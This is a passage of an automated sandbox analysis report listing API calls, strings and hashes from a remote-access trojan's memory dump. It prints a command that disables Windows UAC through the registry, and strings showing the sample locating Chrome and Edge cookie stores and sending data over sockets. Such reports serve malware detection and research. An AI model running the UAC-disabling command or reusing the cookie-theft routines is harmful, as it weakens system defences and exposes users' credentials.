                              • GetLastError.KERNEL32 ref: 0041D580
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ClassCreateErrorLastRegisterWindow
                              • String ID: 0$MsgWindowClass
                              • API String ID: 2877667751-2410386613
                              • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                              • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                              • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                              • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                              APIs
                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                              • CloseHandle.KERNEL32(?), ref: 004077AA
                              • CloseHandle.KERNEL32(?), ref: 004077AF
                              Strings
                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                              • C:\Windows\System32\cmd.exe, xrefs: 00407796
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$CreateProcess
                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                              • API String ID: 2922976086-4183131282
                              • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                              • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                              • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                              • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                              Strings
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, xrefs: 004076C4
                              • SG, xrefs: 004076DA
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                              • API String ID: 0-4153219426
                              • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                              • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                              • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                              • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                              • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                              • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                              • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                              • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                              • String ID: KeepAlive | Disabled
                              • API String ID: 2993684571-305739064
                              • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                              • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                              • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                              • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                              APIs
                                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                              • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                              • Sleep.KERNEL32(00002710), ref: 0041AE07
                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: PlaySound$HandleLocalModuleSleepTime
                              • String ID: Alarm triggered
                              • API String ID: 614609389-2816303416
                              • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                              • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                              • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                              • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                              APIs
                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                              Strings
                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                              • API String ID: 3024135584-2418719853
                              • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                              • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                              • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                              • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                              • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                              • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                              • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                              APIs
                                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                              • _free.LIBCMT ref: 00444E06
                              • _free.LIBCMT ref: 00444E1D
                              • _free.LIBCMT ref: 00444E3C
                              • _free.LIBCMT ref: 00444E57
                              • _free.LIBCMT ref: 00444E6E
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$AllocateHeap
                              • String ID:
                              • API String ID: 3033488037-0
                              • Opcode ID: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                              • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                              • Opcode Fuzzy Hash: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                              • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                              APIs
                                • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                              • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                              • String ID:
                              • API String ID: 4269425633-0
                              • Opcode ID: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
                              • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                              • Opcode Fuzzy Hash: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
                              • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                              • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                              • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                              • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                              APIs
                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                              • __alloca_probe_16.LIBCMT ref: 004511B1
                              • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                              • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                              • __freea.LIBCMT ref: 0045121D
                                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                              • String ID:
                              • API String ID: 313313983-0
                              • Opcode ID: 96f15bfe140a09faeb809ebc5c29b58b41f03d59f1561ac9dee06a5207780793
                              • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                              • Opcode Fuzzy Hash: 96f15bfe140a09faeb809ebc5c29b58b41f03d59f1561ac9dee06a5207780793
                              • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                              APIs
                              • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                              • _free.LIBCMT ref: 0044F3BF
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                              • String ID:
                              • API String ID: 336800556-0
                              • Opcode ID: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                              • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                              • Opcode Fuzzy Hash: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                              • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                              APIs
                              • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                              • _free.LIBCMT ref: 004482D3
                              • _free.LIBCMT ref: 004482FA
                              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free
                              • String ID:
                              • API String ID: 3170660625-0
                              • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                              • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                              • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                              • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                              APIs
                              • _free.LIBCMT ref: 004509D4
                                • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                              • _free.LIBCMT ref: 004509E6
                              • _free.LIBCMT ref: 004509F8
                              • _free.LIBCMT ref: 00450A0A
                              • _free.LIBCMT ref: 00450A1C
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                              • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                              • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                              • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                              APIs
                              • _free.LIBCMT ref: 00444066
                                • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                              • _free.LIBCMT ref: 00444078
                              • _free.LIBCMT ref: 0044408B
                              • _free.LIBCMT ref: 0044409C
                              • _free.LIBCMT ref: 004440AD
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                              • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                              • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                              • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                              APIs
                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFileKeyboardLayoutNameconnectsend
                              • String ID: XQG$NG$PG
                              • API String ID: 1634807452-3565412412
                              • Opcode ID: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
                              • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                              • Opcode Fuzzy Hash: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
                              • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                              APIs
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                              • String ID: `#D$`#D
                              • API String ID: 885266447-2450397995
                              • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                              • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                              • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                              • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000104), ref: 00443475
                              • _free.LIBCMT ref: 00443540
                              • _free.LIBCMT ref: 0044354A
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$FileModuleName
                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                              • API String ID: 2506810119-4009286469
                              • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                              • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                              • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                              • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                              • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                              • String ID: /sort "Visit Time" /stext "$0NG
                              • API String ID: 368326130-3219657780
                              • Opcode ID: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
                              • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                              • Opcode Fuzzy Hash: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
                              • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                              APIs
                              • _wcslen.LIBCMT ref: 004162F5
                                • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _wcslen$CloseCreateValue
                              • String ID: !D@$okmode$PG
                              • API String ID: 3411444782-3370592832
                              • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                              • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                              • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                              • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                              APIs
                                • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                              • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                              Strings
                              • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                              • User Data\Default\Network\Cookies, xrefs: 0040C603
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExistsFilePath
                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                              • API String ID: 1174141254-1980882731
                              • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                              • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                              • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                              • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                              APIs
                                • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                              • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                              Strings
                              • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
